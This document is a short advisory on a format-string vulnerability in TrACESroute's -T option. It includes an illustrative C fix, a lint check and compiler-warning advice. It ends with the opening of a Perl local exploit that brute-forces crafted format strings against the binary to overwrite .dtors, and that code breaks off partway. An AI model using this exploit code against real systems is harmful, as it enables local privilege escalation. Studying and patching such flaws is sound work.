A format string vulnerability exists in TrACESroute. The problem exists in the terminator (-T) function of the program. Due to improper use of the fprintf function, an attacker may be able to supply a malicious format string to the program that results in attacker-supplied values being written to arbitrary locations in memory.
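The defect described above is the classic "untrusted data used as the format argument" mistake. The C below is an added example, not code from the advisory, the exploit or TrACESroute itself: the function names (log_terminator_fixed, count_directives, render_fixed) and the sample terminator string are constructed for illustration. It shows the vulnerable call shape as the program's -T handling is described, the one-token fix (a constant format with the user string passed as data), and a small reviewer check that counts conversion directives in a string that is about to be used as a format, which is exactly the condition that makes the original call dangerous.

```c
#include <stdio.h>
#include <string.h>

/* Added example; not the advisory's or TrACESroute's own code.
 *
 * Vulnerable shape described in the advisory (left as a comment so it is not
 * compiled in): the -T argument is handed to fprintf as the format itself.
 *
 *     fprintf(out, term);        // BUG: %x, %s, %n in term are interpreted
 *
 * Fixed shape: the format is a constant and the untrusted text is only data. */
void log_terminator_fixed(FILE *out, const char *term)
{
    fprintf(out, "%s", term);    /* term is printed verbatim, never parsed */
}

/* Reviewer/lint check: count conversion directives in a string. A non-zero
 * count for data that came from argv or the network means using it as a
 * format is unsafe. "%%" is an escaped percent sign and is not counted. */
int count_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {       /* "%%" renders a literal '%' */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* Render the fixed form into a buffer so its behaviour can be checked:
 * returns the number of bytes snprintf would write (excluding the NUL),
 * or -1 on error, and out holds the terminator text unchanged. */
int render_fixed(char *out, size_t outsz, const char *term)
{
    int n = snprintf(out, outsz, "%s", term);
    return n < 0 ? -1 : n;
}

int main(void)
{
    /* Constructed sample input; the directives are deliberately included so
     * the check has something to find. */
    const char *term = "trace-%x-%n";
    char buf[64];

    printf("conversion directives in -T argument: %d\n",
           count_directives(term));
    render_fixed(buf, sizeof buf, term);
    printf("rendered through a constant format: %s\n", buf);
    log_terminator_fixed(stdout, term);
    putchar('\n');
    return 0;
}
```

Beyond the code change, compiling with -Wformat -Wformat-security (a warning most GCC and Clang builds enable when the format is not a literal and no arguments follow it) flags the vulnerable call shape at build time, which is the cheapest place to catch this class of bug.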
#!/usr/bin/perl
## ---/ tracesex.pl /---------------------------------------------------
##
## TrACESroute 6.0 GOLD local format string exploit
## * tested on Red Hat Linux release 7.2 (Enigma)
## * Jun 12 2002
##
## Author: stringz // thc@drug.org
## Vulnerability discovered by: downbload // downbload@hotmail.com
##
## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
##
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
## obscure, jove, rachel, kevin, and all of my 2e2h friends.
##
## ---/ powered by pot /-----------------------------------------------
for (1 .. 300) {
$fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
die("\x0a") if (system("$vuln -T $fmt_str localhost"))
=~ m/^(0|256|512|32512)$/; # may need a tweak ;)
}
sub
sw_fmtstr_create ($$$)
{
die("Incorrect number of arguments for sw_fmtstr_create")
unless @_ == 3;
my ($dest_addr, $ret_addr, $dist) = @_;
my ($word, $qword) = (2, 8);
# $dest_addr = where to write $ret_addr
# $ret_addr = where to return execution
# $dist = the calculated distance